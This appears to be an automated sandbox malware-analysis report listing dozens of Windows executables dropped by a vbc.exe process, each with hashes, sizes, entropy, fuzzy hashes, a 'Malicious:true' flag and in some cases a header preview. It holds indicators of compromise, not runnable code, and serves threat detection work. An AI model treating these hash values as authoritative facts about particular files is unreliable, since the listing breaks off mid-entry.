SHA1:32FC3D448A55804C640ABB59FA19838E0319215E
SHA-256:D2F8D25096210E98C8F16DBADE29D6186B3C764D04EDDF85E4E3E7A6C932D447
SHA-512:7E7646D3436017E3D43ECDB539F7188CABE6DAC8D325A788437B02B25C57AB29F60DC366A28DDD7F5A00FC02456D554417E54DCADCA519D4C0BB9FEF2A0328A6
Malicious:true
Reputation:unknown
Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
File Type:PE32+ executable (GUI) x86-64, for MS Windows
Category:dropped
Size (bytes):1161728
Entropy (8bit):5.047174220454958
Encrypted:false
SSDEEP:12288:RUXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:GsqjnhMgeiCl7G0nehbGZpbD
MD5:52995FB55FB7CFFB2C0D5D3CC45F4C41
SHA1:2A4EC318F35859ACC74C3C6EEA7585225FE77368
SHA-256:35E9D03417E856C16812BA842D3A3D8136A99EDD9AF2F8DBD36BDB82E644ECA6
SHA-512:24D47B2B4C400D97982723918224AEC3DCFE52E395708EF398B12FFBB2B56EEF8339B0E51D964A99B8317292B172571C49156FA9A6F0A27AE8BE24F18F1C3E29
Malicious:true
Reputation:unknown
Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
File Type:PE32+ executable (GUI) x86-64, for MS Windows
Category:dropped
Size (bytes):4151808
Entropy (8bit):6.499787057734289
Encrypted:false
SSDEEP:49152:ntuUC0nNc/RcYHCY9AWWnURqdHIEogMAYrukdUmSC+bXMZQU1QqpN755xDmg27RN:njEIa4HIEWOc53D527BWG
MD5:141EDACAF70B481E1C3D9354978F03A4
SHA1:47A5AD1D23F9150110698FF6633576145A050E72
SHA-256:40AD6CFECAE026376BC506A690512124E2132734BB92CC492179DB604F8B97C3
SHA-512:56912476E62B1A94568965CB917418A3E40CB9DB4C3815D48792351191E14B49BF817A1D03399D3B96700FEA1D6008F3165538E2EEDF6C7221C7098AC6F4C1FC
Malicious:true
Reputation:unknown
Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
File Type:PE32+ executable (GUI) x86-64, for MS Windows
Category:dropped
Size (bytes):59941376
Entropy (8bit):7.99936733426603
Encrypted:true
SSDEEP:1572864:1Qb5m2CYw2bheyHA2DiAVPNqCPiQwm9tqGWS15Vj9QVqd2+NAs:uXhwMhe6AABPiQwF6xQ22R
MD5:10389E883940C208AF0DBF79E346AA82
SHA1:52FB17E12AF21EA9513B047354CB7A9871A7D157
SHA-256:6FB28F41B680B798E3301C0E7184E9AF7DE68BA49F0488B808A950C6001CED87
SHA-512:7DFB4195506250D19918ED0D07E757DB6FE492F75C93325E0EFFFC72E70616DCF3BA6F10DDCB732AE01E7C49439AB1B34B5906CB7137BB4699483F6AE2A446B4
Malicious:true
Reputation:unknown
Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
File Type:PE32 executable (GUI) Intel 80386, for MS Windows
Category:dropped
Size (bytes):1230336
Entropy (8bit):5.185609431094396
Encrypted:false
SSDEEP:12288:mejVWYUAUXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:DjkY7UsqjnhMgeiCl7G0nehbGZpbD
MD5:DDF18AEA49B04A30411A7FA6F181A82D
SHA1:89C6F4A59AEA0160DA0FFABEF4AB9464E2C934C8
SHA-256:8EE8B79EFCE9739FBBDDDA6BA65186874A24A6FDBD57DA539BF6CCFF2B92F2D1
SHA-512:AEC030FAE6B4B4E7943204911DD630A2D6B6FD89736295AC0C9B0B27C855EC396518AEAF8511FD5894C22258F7222A39DB39599A3ECA201297443A6B02A95D33
Malicious:true
Reputation:unknown
Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
File Type:PE32+ executable (GUI) x86-64, for MS Windows
Category:dropped
Size (bytes):1384960
Entropy (8bit):5.377835155980864
Encrypted:false
SSDEEP:24576:1xwSJhkrmZsosqjnhMgeiCl7G0nehbGZpbD:1y+krKsUDmg27RnWGj
MD5:2FFD59B4636F6760B30B1E109632C201
SHA1:729AEF99A27A44AE3A9D35E7779A69EE82584CFE
SHA-256:F6BA77CD80DFDE6C43938C8F2723DFF1E60557A090ECFC6B750024BA7E2D7823
SHA-512:E95B6061E72C480E542EFF01C1D26875964710F056DEF02D158EE6ED4E853B515870E4EBAB077B35AFEC0BA6206856E48949508C1F8AA587354C721123891126
Malicious:true
Reputation:unknown
Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
File Type:PE32+ executable (GUI) x86-64, for MS Windows
Category:dropped
Size (bytes):1649152
Entropy (8bit):5.632746320404695
Encrypted:false
SSDEEP:24576:JHQJLIRgvsnN5sqjnhMgeiCl7G0nehbGZpbD:JHQJL349Dmg27RnWGj
MD5:115B0775DDF7AC56CC75908D3F500172
SHA1:A431073986A6105CA4E1C4E77335387550FFFAC0
SHA-256:67EB7CDFDBB6AD17C9F6ADDE61F167EC93E00DA80C9D7005516426ECB37D4D1A
SHA-512:DB12BFBAC4C185026479D9F9E30454EB2700FD28E16119DFC3829F6D9EE8AF4ADD744A04C7889BACE497F7712CB57F05FF81FD321A8AE4FB5FF8AF2F5D912403
Malicious:true
Reputation:unknown
Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
File Type:PE32 executable (GUI) Intel 80386, for MS Windows
Category:dropped
Size (bytes):5365760
Entropy (8bit):6.450977550702275
Encrypted:false
SSDEEP:49152:BUZujDjDjDjXmXgoz2PsapFQrC7dRpqbeE8U2IzwDt+bdro4O8b8ITDnlggyJ1ko:mWmXL6DEC7dRpKuDQbgSD527BWG
MD5:C37FACD897A1D9BE9B8999DB058512E7
SHA1:455EE52581909FE51D23B07E7B63D93F751CFE48
SHA-256:B9D5C10F69676C09D1B71E94A188F76C4D00F2922B3749AFB5D7C273A72BB278
SHA-512:C87F227DF08D71A199069B2D6BC2822F3BB066447463A6DCCA4C7DB4A3E4CB95F269DD422CFD2689EED38ACF99115C15B1392A7577B1B5C581A8817539FAC003
Malicious:true
Reputation:unknown
Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
File Type:PE32 executable (GUI) Intel 80386, for MS Windows
Category:dropped
Size (bytes):3163136
Entropy (8bit):7.972783202893685
Encrypted:false
SSDEEP:98304:6rZ23AbsK6Ro022JjL2WEiVqJZRD527BWG:0JADmmxL2WEoCZRVQBWG
MD5:5A7B5E67A247F3621D2A1A5B724F23D6
SHA1:204C598743000E8E140BA26FC7DC179996D0CA09
SHA-256:8C48BE8A358C031435172B8CCD0FAABB4D25D350E6DFE108CB5E633B73A4D729
SHA-512:CB5AC1806DD234C88235C4C937C84C5A5285B6F6ED0A5E875FCB1394BCB8E58580050C1357727D4EBA3C401D73FB8A87990C3DFCE731AC68EC11664540A83CEF
Malicious:true
Reputation:unknown
Process: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
File Type: PE32+ executable (GUI) x86-64, for MS Windows
Category: dropped
Size (bytes): 1213440
Entropy (8bit): 7.204931137690633
Encrypted: false
SSDEEP: 24576:0frYY42wd7hlOw9fpkEE644sqjnhMgeiCl7G0nehbGZpbD:Jz9xrSkDmg27RnWGj
MD5: 034B1834FF4C694072EBCFEA9339232A
SHA1: 85F144F4273BAA9205EB97C0AA22D269C43A52DD
SHA-256: EE57B9DB3307DCF36C6E3C31B2679B64EF8C4504274D26B8D8DC60A39F4E56B2
SHA-512: 1391A90200E726EB8EC72BA6408C62C9C0C7390BC59FAA98BC59EA63A475B662DA473B012465E909AF3BAFF96831933C92E18C859D092184A6524D82473EAB0C
Malicious: true
Reputation: unknown
Process: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
File Type: PE32+ executable (GUI) x86-64, for MS Windows
Category: dropped
Size (bytes): 1388544
Entropy (8bit): 5.272952915922038
Encrypted: false
SSDEEP: 12288:DwkNKiZ+R2GGNUbTF5zXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/T:DzNKUE5zsqjnhMgeiCl7G0nehbGZpbD
MD5: 8D348E51F8069BC0B8AF286A2D8796A8
SHA1: 0BF2B4901018FE940CA9D5D6C628F86A68329BAA
SHA-256: B49942764D3DB10349AA5F4CC0A79B0046776E79265DE87AC53BDA120C4F871E
SHA-512: 7E804C14EDB0BCF3760E0C85D518F569630477F76B0CDE3BBAC08146FAC38DF977023B4EB60A59312593ACCE783D5C5AD222D414EA3F07F6AB0D1D912902673F
Malicious: true
Reputation: unknown
Process: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
File Type: PE32+ executable (GUI) x86-64, for MS Windows
Category: dropped
Size (bytes): 5855744
Entropy (8bit): 6.574343016884408
Encrypted: false
SSDEEP: 98304:TALuzDKnxCp3JKNrPJzruaI6HMaJTtGbGD527BWG:EaGg3cFPIaI6HMaJTtGbGVQBWG
MD5: B81AFC19C9D8BAAC5570BE09B27B0A0F
SHA1: 95FEAD3A67B7599EDEF06F24C4CCBA2CE0622F00
SHA-256: 225F99363C6166116A7012ADBB35B6E06B790C9A59CE49B54698524899BE048A
SHA-512: C5796A69CDF1DA8A6037CFD7F79CB416F4FD1DBA946509F7CE14629F59376BC082C221552D0CD9904D229C3D18FC5D29B07309AE32396D7912685FDAC9949746
Malicious: true
Reputation: unknown
Process: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
File Type: PE32 executable (GUI) Intel 80386, for MS Windows
Category: dropped
Size (bytes): 1312768
Entropy (8bit): 5.3560930813389245
Encrypted: false
SSDEEP: 24576:oXr/SVMxW8sqjnhMgeiCl7G0nehbGZpbD:o1xRDmg27RnWGj
MD5: EC709FE78BFAEFFDDE20A122069F98DE
SHA1: 782CF3B53FD15EE360676EACB6FEE5C8F5518AB4
SHA-256: 50864D30049CFEA867E6559E260289C7E40F1AB11171B494CB8DF1A34DD3EDB2
SHA-512: 4C82C5B9F89E96C1A93F3D30BCED95BEEF9992C209D3BDDD7EED089CBC12E5EB62FFBA58B03639CB3B681FA94A238082B9C6F8C0B00425C0F78C4EBC4CFCA395
Malicious: true
Reputation: unknown
Process: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
File Type: PE32+ executable (GUI) x86-64, for MS Windows
Category: dropped
Size (bytes): 27533312
Entropy (8bit): 6.248638638842956
Encrypted: false
SSDEEP: 196608:FhRrmpGpGdJM7Hbp8JfrCGvqYYuNDmoefAlprtPz25HqaI6HMaJTtGbQOCVQBWG:FhRCpGpMJMrbp8JjpNdNlc5eB
MD5: CD76A471F612BCB209F792AAFC4CF23D
SHA1: FE6D2D172717FB32280D939B324EA37D2C8EDADF
SHA-256: AF1A0F40D0B871A3C52730A7DB1E30F056D854D8EC948D05405331D792B5D8FF
SHA-512: DB0C619FB11E7C5A08621C646402158DCD59F4CD15DF526429F8F47C1CD156090568D7867E7ED0A43F9ABE7E9D2CCC94A76BCA73BC07A933B7CC5407FD75B3EF
Malicious: true
Reputation: unknown
Process: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
File Type: PE32+ executable (GUI) x86-64, for MS Windows
Category: dropped
Size (bytes): 2199552
Entropy (8bit): 6.789021967279555
Encrypted: false
SSDEEP: 49152:z83pZ3kd0CuEeN0LUmRXzYs65maDmg27RnWGj:DKuUQY15tD527BWG
MD5: 4614C8E1636BF858FCE3109AF7B7AA4D
SHA1: 531C759D91C3606CE34A4028FF6FAE756D1486E8
SHA-256: 28264F8CE4166D27ECE456949FD0284F605FC1B6B72AA7AFC65730B2BC25BDE8
SHA-512: EAEEFD05ACF7C6B4E3EBA8982D965F2910789DC2892359C213FD6D79F4B73FEEE2DC427B74BB048EFD11885503D879646734A768348603B859F599E7DFF1C1A0
Malicious: true
Reputation: unknown
Process: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
File Type: PE32+ executable (console) x86-64, for MS Windows
Category: dropped
Size (bytes): 4971008
Entropy (8bit): 6.670844489289887
Encrypted: false
SSDEEP: 49152:HErw1zDb1mZtOoGpDYdSTtWXy4eqH8nYAmoBvYQugWupoI6bAGOpndOPcptz6+MZ:xA4oGlcR+glEdOPKzgVZID527BWG
MD5: 1AF4DAAD397237F74EC085E35D33F45D
SHA1: D4CE8433E8A47BA59F65B3420E83AB5622036F88
SHA-256: FDD661353F34AAE604EC854668CA916A6AF67C21B6B7F43333BBF6AAA7E7F6CD
SHA-512: 613BDCDDB4554A53C4B0D3DAC96046CE6EEC29C7199BF7FD8D8D5413391A4CC69E78F2348AD77FD3B2BF4A101E1CC651A272C4993EDF290F41BD7A685D74836D
Malicious: true
Reputation: unknown
Process: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
File Type: PE32+ executable (GUI) x86-64, for MS Windows
Category: dropped
Size (bytes): 4897792
Entropy (8bit): 6.82977249855355
Encrypted: false
SSDEEP: 49152:v8ErDqTGsitHloGgkiDrCvJVZfEcpwD06LgVCM2hnwLNwiHaGI3Y/685ZYMaWgKj:kv2gM+qwXLg7pPgw/DSZ9PD527BWG
MD5: D53A28F6CEFA448F5476D1530EE7B504
SHA1: 32F272DB73C96BA6F6B167E51A61B950DD0F67DE
SHA-256: 85B2AEEE79ABB3CABD8F3D0368F26C66915DA14779F69DD79BC850120937A397
SHA-512: 1C1731945EAE36FEF022CC0838DD387788DF6DF8A70D4806B216A64E9E29A9FAACBB46BC93BCB805728E28331664203EC1310DA3A619A6A62DFAA3EEFCE0756B
Malicious: true
Reputation: unknown
                                                                                                                                                                    Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d....|.e.........."......D/......... ..........@..............................L......4K... ...........................................6.N.....6.......<......P:.l.....................6......................6.(...`s/.@.............6.8.....6.@....................text....C/......D/................. ..`.rdata......`/......H/.............@..@.data...4:....8.......7.............@....pdata..l....P:.......9.............@..@.00cfg..0.....;.......:.............@..@.gxfg....1....;..2....:.............@..@.retplne.....0<.......:..................tls....A....@<.......:.............@...CPADinfo8....P<.......:.............@...LZMADEC......`<.......:............. ..`_RDATA..\.....<.......:.............@..@malloc_h......<.......:............. ..`.rsrc.........<.......:.............@..@.reloc... ...`C.......A.............@...........................................................
                                                                                                                                                                    Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
                                                                                                                                                                    File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):4897792
                                                                                                                                                                    Entropy (8bit):6.829770450947602
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:49152:P8ErDqTGsitHloGgkiDrCvJVZfEcpwD06LgVCM2hnwLNwiHaGI3Y/685ZYMaWgKj:Ev2gM+qwXLg7pPgw/DSZ9PD527BWG
                                                                                                                                                                    MD5:B19EC0932A4F12E899583472D68FA02A
                                                                                                                                                                    SHA1:2467B482FE4CB554F1BA4F0FFD44A996494CC29C
                                                                                                                                                                    SHA-256:E5B7576F9846BFA716E4B6CF39A7F1DF16582A78EC50CE777D5AB63FACB74E97
                                                                                                                                                                    SHA-512:768E31BDB055FEE033C9D3CA71C1D94DAFDC2DEED021F03AEB22567E5BCDF87A12A9C0DEDACF25A6639C2EF30E7F04515F0E641C15CA26B1E5837D07D5C82EF9
                                                                                                                                                                    Malicious:true
                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                    Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d....|.e.........."......D/......... ..........@..............................L.....+pK... ...........................................6.N.....6.......<......P:.l.....................6......................6.(...`s/.@.............6.8.....6.@....................text....C/......D/................. ..`.rdata......`/......H/.............@..@.data...4:....8.......7.............@....pdata..l....P:.......9.............@..@.00cfg..0.....;.......:.............@..@.gxfg....1....;..2....:.............@..@.retplne.....0<.......:..................tls....A....@<.......:.............@...CPADinfo8....P<.......:.............@...LZMADEC......`<.......:............. ..`_RDATA..\.....<.......:.............@..@malloc_h......<.......:............. ..`.rsrc.........<.......:.............@..@.reloc... ...`C.......A.............@...........................................................
                                                                                                                                                                    Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
                                                                                                                                                                    File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):2156544
                                                                                                                                                                    Entropy (8bit):6.953590297449121
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:24576:StjqL8fH+8aUbp8D/8+xQWA1sqjnhMgeiCl7G0nehbGZpbD:qjKK+81FI/85vDmg27RnWGj
                                                                                                                                                                    MD5:06FA822B548C77730F1735784B68166E
                                                                                                                                                                    SHA1:5826E012C8E0332040891B51A5F2316AF57186B3
                                                                                                                                                                    SHA-256:1C22623059BD2E902F6FDC7170F0CE74E95F81984235BEDA94C3F604D66F712C
                                                                                                                                                                    SHA-512:814762F424DCA25E343C37913C7E409C511098351FF322BEE9057DA7A359090EDD47B193E86E246DD9EDAA9682AA229BA7A8DFA87413E8B20F755E9E0B97C423
                                                                                                                                                                    Malicious:true
                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                    Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d....|.e.........."......F.....................@.............................P"......L!... ..........................................X..\...$Y....... ...&......(...................lM......................PL..(...pr..@............_...............................text....D.......F.................. ..`.rdata..$....`.......J..............@..@.data...,.... ......................@....pdata..(...........................@..@.00cfg..0...........................@..@.gxfg....,..........................@..@.retplne.................................tls................................@...LZMADEC............................. ..`_RDATA..\...........................@..@malloc_h............................ ..`.rsrc....&... ...(..................@..@.reloc.......P......................@...................................................................................................
                                                                                                                                                                    Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
                                                                                                                                                                    File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):2370560
                                                                                                                                                                    Entropy (8bit):7.032403287146288
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:49152:rAMsOu3JfCIGnZuTodRFYKBrFxbWp5Dmg27RnWGj:rAMa38ZuTSmD527BWG
                                                                                                                                                                    MD5:C2E01E0D0EC3AEA55609EDA9883C220F
                                                                                                                                                                    SHA1:38733487B15B48C34B03147BEBB6A84C6C929DA7
                                                                                                                                                                    SHA-256:A7812A3BE06D9E19D116319A06F1CB65E0CD82E95C7FF55EBDB1CBFD2DF5B26F
                                                                                                                                                                    SHA-512:B5C2F1C2C11FF8BDBB7A738B86376691DACF4B3CA6772B492F7B7299D6210FDF6D763D8E5CA056B7C4017B18169C96FBDA93F965AAB8C5095786F6FD591D6165
                                                                                                                                                                    Malicious:true
                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                    Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d....|.e..........".................0..........@..............................%......C$... ..........................................}..Z...Z}...............@..`...................$k.......................j..(.......@............... ............................text...V........................... ..`.rdata..Hv.......x..................@..@.data...t....`.......>..............@....pdata..`....@.......6..............@..@.00cfg..0...........................@..@.gxfg....+.......,..................@..@.retplne.....@...........................tls....A....P......................@..._RDATA..\....`....... ..............@..@malloc_h.....p.......".............. ..`.rsrc................$..............@..@.reloc...............<..............@...........................................................................................................................................
                                                                                                                                                                    Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
                                                                                                                                                                    File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):1984512
                                                                                                                                                                    Entropy (8bit):7.104348808404516
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:24576:1wbK7tnhD4aH6wD2Krx5NgOOagtE8F9sqjnhMgeiCl7G0nehbGZpbD:1SK7Fhslq2EPfOfEoDmg27RnWGj
                                                                                                                                                                    MD5:62D7BE7926330B5798A303BADA330473
                                                                                                                                                                    SHA1:B02A92BB15DC50BAE30A49FA681ED8F42D9659CD
                                                                                                                                                                    SHA-256:EABC5A84390F829B0F72BDF5DDE1124EACD50973428C8A6169D0EA109DFA7647
                                                                                                                                                                    SHA-512:9A77137FBF128FA18F753784B186021AD1D3C9118D1F1FA5000ADDDAE18309E02228904167A86525FBE125AE6827A002D83240238E1F4BD39E311B950E433EE4
                                                                                                                                                                    Malicious:true
                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                    Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d....|.e.........."............................@....................................D..... ............................................\...$................p..t...............................................(...P...@...........x...x............................text............................... ..`.rdata..............................@..@.data................z..............@....pdata..t....p.......x..............@..@.00cfg..0...........................@..@.gxfg...@-... ......................@..@.retplne.....P.......D...................tls.........`.......F..............@...CPADinfo8....p.......H..............@..._RDATA..\............J..............@..@malloc_h.............L.............. ..`.rsrc................N..............@..@.reloc...............X..............@...................................................................................................
                                                                                                                                                                    Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
                                                                                                                                                                    File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):1779712
                                                                                                                                                                    Entropy (8bit):7.1580792784354355
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:24576:LKI7Twj5KDHxJ1FxyD+/wsG1Tbbc9sqjnhMgeiCl7G0nehbGZpbD:Lv7e0j31mD+/wDfbGDmg27RnWGj
                                                                                                                                                                    MD5:CA195BEC5473B818BA2642965AD22F63
                                                                                                                                                                    SHA1:76E3B94FD78AAFB937BCD00818C489776A1D22CC
                                                                                                                                                                    SHA-256:51BEB000F026A0B6C026AFEB0A6F9FC3632F1EF0BE66B60439D2073B93D31CA5
                                                                                                                                                                    SHA-512:AD448A0AFE752FA7F6F954588694011979082A1EEDE5C7C757F536B9C24078D678B30BFD3278984B9FCEE021980C4DDD4E026659AE0A6EDD17ACCBC5A3884482
                                                                                                                                                                    Malicious:true
                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                    Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d....|.e.........."..........B.................@.......................................... .........................................X...U...............x....p.................................................(...`2..@...............X............................text............................... ..`.rdata..,w... ...x..................@..@.data...............................@....pdata......p.......x..............@..@.00cfg..0...........................@..@.gxfg....).......*..................@..@.retplne.....@.......&...................tls.........P.......(..............@..._RDATA..\....`.......*..............@..@malloc_h.....p.......,.............. ..`.rsrc...x...........................@..@.reloc...............8..............@...........................................................................................................................................
                                                                                                                                                                    Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
                                                                                                                                                                    File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):1378304
                                                                                                                                                                    Entropy (8bit):5.377452042537901
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:12288:RQUVPDHhSWXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kw:CyhSWsqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                    MD5:68016A02800BAAB45108CA3D2EBF4832
                                                                                                                                                                    SHA1:483F8BF91F52EA35D0C1145BA715ADAE1DC98296
                                                                                                                                                                    SHA-256:E72572C821F9C534354AB707195F85971141528142132CA8970FF0690D38BB31
                                                                                                                                                                    SHA-512:3C3233342676D84849E94417530488649B5110FF83C0B8F113681958F7E732D196FF7C27797264CF07500665878441016D9282884C605596239688C37CE17EC8
                                                                                                                                                                    Malicious:true
                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                    Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d......e.........."............................@.............................p........... ..................................................................P......................T...........................(...p...8...........H................................text............................... ..`.rdata...h.......j..................@..@.data........@......................@....pdata.......P.......0..............@..@.00cfg..(....`.......@..............@..@.tls.........p.......B..............@....voltbl..............D...................rsrc................F..............@..@.reloc...P... ...@..................@...................................................................................................................................................................................................................................................................
                                                                                                                                                                    Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
                                                                                                                                                                    File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):1286656
                                                                                                                                                                    Entropy (8bit):7.22212252444987
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:24576:msFfc1VyFn5UQn652bO4HFsqjnhMgeiCl7G0nehbGZpbD:msFcIn5rJ/Dmg27RnWGj
                                                                                                                                                                    MD5:8D06F93D74D4274B4348B6C3F38E1FF0
                                                                                                                                                                    SHA1:A7A44B9BF5012F8633C7D40E900F5E1CF3FDF519
                                                                                                                                                                    SHA-256:7F4CA0815409803338DAC9736A13588FFF99740B067FCC63EDBB3B494646F962
                                                                                                                                                                    SHA-512:0D5B64AFD79095547F37292BA66FDC83C151626893FF18A6A5D2BEB07146E636C52972E77DC8ADAED6751FFD4160DE6962766672BC9CB03B9E905D2D3B225DBE
                                                                                                                                                                    Malicious:true
                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                    Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d......e.........."......6..........pX.........@....................................q..... ..........................................J.......K..........`........%..................DA..........................(...`...8............V...............................text...V5.......6.................. ..`.rdata...O...P...P...:..............@..@.data...............................@....pdata...%.......&..................@..@.00cfg..(...........................@..@.tls................................@....voltbl..................................rsrc...`...........................@..@.reloc....... ......................@...................................................................................................................................................................................................................................................................
                                                                                                                                                                    Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
                                                                                                                                                                    File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):1246208
                                                                                                                                                                    Entropy (8bit):7.494297674597622
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:24576:Zt9o6p4xQbiKI69wpemIwpel9ysqjnhMgeiCl7G0nehbGZpbD:Zt9faQbtl2peapelsDmg27RnWGj
                                                                                                                                                                    MD5:8BF7FBE7384CEC16C575F2CBE5C3B225
                                                                                                                                                                    SHA1:44DC89818AA111FD97E23D21E5AC5610E324FDB6
                                                                                                                                                                    SHA-256:99AD5BB9EBC325E18197809206ABE16DC4D1421D5F93208874C704AB2253CDFE
                                                                                                                                                                    SHA-512:3DDE349AF2E0CF61D1947BF3112E44F31090F6176881D58FE312E65BE611C1BEC6961D6D78A2302160C4EA2478894ED931D59DD0ED1C4E7481B6B8745AD34E8D
                                                                                                                                                                    Malicious:true
                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                    Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d......e.........."......$.....................@....................................*..... .................................................g...h............P..t%..................4........................k..(....@..8...........P...........@....................text....".......$.................. ..`.rdata.......@.......(..............@..@.data...p+... ......................@....pdata..t%...P...&..................@..@.00cfg..(............2..............@..@.freestd.............4..............@..@.retplne$............6...................tls.................8..............@....voltbl..............:...................rsrc................<..............@..@.reloc...............$..............@...................................................................................................................................................................................
Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
File Type:PE32+ executable (GUI) x86-64, for MS Windows
Category:dropped
Size (bytes):1356800
Entropy (8bit):5.34785709875411
Encrypted:false
SSDEEP:24576:IQVTZu0JtsqjnhMgeiCl7G0nehbGZpbD:nVTZucDmg27RnWGj
MD5:C94AE04B5DB3D97303DDB9E3549E9F8C
SHA1:59B8EBE238864624F39399DA92E5A643484091B8
SHA-256:7F4E11BDAAEE994A2CC99F46470C2DF57D7651DFD491AB083CC2DDE3D174ED9C
SHA-512:46BEB6913B97D96410D0F9072AD8AC4CE40EE6AD2E927440A16AD29940377E05557C8FDE3662EBEBED20222DA96A116BFA2A79DFA968E641F81B5AFB00848B75
Malicious:true
Reputation:unknown
Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
File Type:PE32+ executable (console) x86-64, for MS Windows
Category:dropped
Size (bytes):1344000
Entropy (8bit):6.808402315870007
Encrypted:false
SSDEEP:24576:ZC1vpgXcZHz7sqjnhMgeiCl7G0nehbGZpbD:ZC1vpIcNvDmg27RnWGj
MD5:79CE77F95747FFF18E30B26927679155
SHA1:AAE2594FA8338C3C57823BC8882DD02533F78FE7
SHA-256:E857D140F25A719F39C65B100E63B6A1B57CBB8408DA78E971A96A7DFF0FB813
SHA-512:8B007473E837F3347F9FB73608B866E392AFE2F2D62D8DCE37EEBF37FD78438356B6CFD62BAD1A2E41CFA257A066D1FBA20AA6FE797A39515612BCE8AEED33DA
Malicious:true
Reputation:unknown
Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
File Type:PE32+ executable (console) x86-64, for MS Windows
Category:dropped
Size (bytes):1200128
Entropy (8bit):5.140043544149065
Encrypted:false
SSDEEP:12288:xSwjnXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:xvnsqjnhMgeiCl7G0nehbGZpbD
MD5:9FEB05E1EE1835574C259610F65FEFDE
SHA1:E7536A7832149BCB7C296A81F02EF5575213B680
SHA-256:3D3E948D4680F57F7F6E74499A6C3641F00AF3C7E1D74071DA3A8695F6FF836C
SHA-512:A911EB1DDAC0BA0113656FF1A4B062BA3D5F1A932274EDF4D2D0B353557B1CA18B58366404DC17749EFD28020BD1B7C8405EA9E0317BC17D1CFE1B363674E717
Malicious:true
Reputation:unknown
Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
File Type:PE32+ executable (GUI) x86-64, for MS Windows
Category:dropped
Size (bytes):1408512
